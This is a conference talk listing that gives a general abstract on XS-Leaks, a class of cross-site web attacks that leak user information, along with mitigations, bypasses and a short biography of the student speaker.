XS-Leaks: Client-Side Attacks in a Post-XSS World
12-09, 10:00–10:15 (Europe/London), Rookie track

The web platform's openness and composability provide many benefits. Yet, the ability for websites to interact with each other has provided many opportunities for attacks that abuse the core principles of the web.

With the evolution of web frameworks and browsers, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) have become increasingly rare. In response, researchers have found new ways to reveal sensitive information about users, giving rise to a new class of vulnerabilities known as XS-Leaks.

XS-Leaks abuse interactions between websites to leak sensitive information about users. Among other things, this includes leaking the user's visit history, leaking the content of a cross-site page, and leaking response status codes in order to de-anonymize a user on the web. In certain cases, this allows a cross-origin site to perform an XS-Search, where characters in a search query are brute-forced to find a query with valid results.

For example, an HTML injection without XSS can be weaponized to leak response status codes of API endpoints, and browser behaviour when approaching the browser's URL length limit can be used to leak 302 redirects.

In this talk, we will explore various XS-Leak techniques that exist in 2023, their mitigations, and some bypasses.

Zayne is a Computer Science student at the University of Cambridge. He is an avid security researcher and CTF player. He holds industry certificates such as the OSWE and OSCP, and has previously worked in TikTok's security team. In his free time, he hunts for bugs on the HackerOne platform, and plays CTFs with Blue Water, one of the top global CTF teams.

Previous talks he has given include HTTP Request Smuggling in the Multiverse of Parsing Flaws at BSides Singapore 2022.